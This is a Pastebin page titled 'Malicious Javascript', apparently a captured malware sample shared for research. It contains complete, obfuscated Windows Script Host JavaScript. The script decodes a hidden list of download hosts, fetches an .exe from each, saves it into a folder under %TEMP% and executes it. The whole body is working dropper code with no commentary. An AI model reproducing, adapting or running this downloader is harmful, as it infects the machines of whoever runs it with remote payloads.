SHARE
TWEET

Malicious Javascript

dynamoo Feb 29th, 2016 144 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2.  
  3. function PnENwlyvJ(vHjcaOQlznv) {
  4. var NphasvLL = WScript.CreateObject("Wscript.Shell");
  5. NphasvLL.Run(vHjcaOQlznv, 0x1, 0x0);
  6. }
  7. function HOpGucZue(WeMHq,Bvmzy,woTkH) {
  8. var kqMgQ = "jZQvsR MHu pt.Shell nutmHCF Scri".split(" ");
  9. var kYZ=((1)?"W" + kqMgQ[4]:"")+kqMgQ[2];
  10. var oI = WScript.CreateObject(kYZ);
  11. var zK = "%TEMP%\\";
  12. return oI.ExpandEnvironmentStrings(zK);
  13. }
  14. function mfPDpXYb() {
  15. var PiRQwTc = "ipting";
  16. var EPfJUumpGx = "ile";
  17. var sUKZH = "System";
  18. return "Sc" + "r" + PiRQwTc + ".F" + EPfJUumpGx + sUKZH + "Obj" + "ect";
  19. }
  20. function MMOt(EXjbN) {
  21. return WScript.CreateObject(EXjbN);
  22. }
  23. function NIwF(BsRNx,OGReG) {
  24. BsRNx.write(OGReG);
  25. }
  26. function AJsz(gaXUm) {
  27. gaXUm.open();
  28. }
  29. function AYMy(nklNg,sCjDD) {
  30. nklNg.saveToFile(sCjDD,542-540);
  31. }
  32. function vOjl(FPpRI,UoIZQ,MXtkg) {
  33. FPpRI.open(MXtkg,UoIZQ,false);
  34. }
  35. function CgWa(JfBRD) {
  36. if (JfBRD == 864-664){return true;} else {return false;}
  37. }
  38. function HlTW(EoAPD) {
  39. if (EoAPD > 176425-148){return true;} else {return false;}
  40. }
  41. function NMLT(UHZEQ) {
  42. var TKMXZ="";
  43. for(x=(153-153); x < UHZEQ.length; x++)
  44. if (x % (849-847) != (256-256)) {
  45. TKMXZ += UHZEQ.substr(x, 241-240);
  46. }
  47. return TKMXZ;
  48. }
  49. function oVGt(bXoBQ) {
  50. bXoBQ.send();
  51. }
  52. function lQWj(BoMrR) {
  53. return BoMrR.status;
  54. }
  55. var Yo="yhGeelDlQoDyXu9nGgWm1eLnTqRqm.ecFoems/D6l98.7esxAe9?F Lo1hNihyVobudnQgYbcuNyhfGfZ.LcGo8mH/T6i9o.teVxceS?u Y?A J?U v?";
  56. var c = NMLT(Yo).split(" ");
  57. var LrW = HOpGucZue("hqwL","dwqHr","hgrELU");
  58. var auz = new ActiveXObject(mfPDpXYb());
  59. var boAJ = LrW+"elbCzuv\\";
  60. try{
  61. auz.CreateFolder(boAJ);
  62. }catch(QaqnaZ){
  63. };
  64. var yng = "2.XMLH";
  65. var rKV = (yng + "TTP" + " KopxpjI YNeoY XML ream St sPdOQrOb AD rzIcuTc OD").split(" ");
  66. var sp = true  , RZce = rKV[7] + "" + rKV[9];
  67. var mL = MMOt("MS"+rKV[3]+(306427, rKV[0]));
  68. var Wub = MMOt(RZce + "B." + rKV[5]+(825927, rKV[4]));
  69. var KbI = 0;
  70. var i = 1;
  71. var dTtgsXS = 912892;
  72. var h=KbI;
  73. while (true)  {
  74. if(h>=c.length) {break;}
  75. var Wt = 0;
  76. var MQv = ("ht" + " DOFHPHM tp whdfV gambqeDe :// bXPmNZP .exe  GET").split(" ");
  77. try  {
  78. vOjl(mL,MQv[0]+MQv[2]+MQv[5]+c[h]+i, "GET"); oVGt(mL); if (CgWa(lQWj(mL)))  {      
  79. AJsz(Wub); Wub.type = 1; NIwF(Wub,mL.responseBody); if (HlTW(Wub.size))  {
  80. Wt = 1; Wub.position = 0; AYMy(Wub,/*qWMW72LFKl*/boAJ/*gr7c91tcbM*/+dTtgsXS+MQv[7]); try  {
  81. if (((new Date())>0,7448464888)) {
  82. PnENwlyvJ(boAJ+dTtgsXS+/*C8KP47dYcj*/MQv[7]/*kGIG32ZLIA*/);
  83. break;
  84. }
  85. }
  86. catch (ra)  {
  87. };
  88. }; Wub.close();
  89. };
  90. if (Wt == 1)  {
  91. KbI = h; break;
  92. };
  93. }
  94. catch (ra)  {
  95. };
  96. h++;
  97. };
RAW Paste Data
Top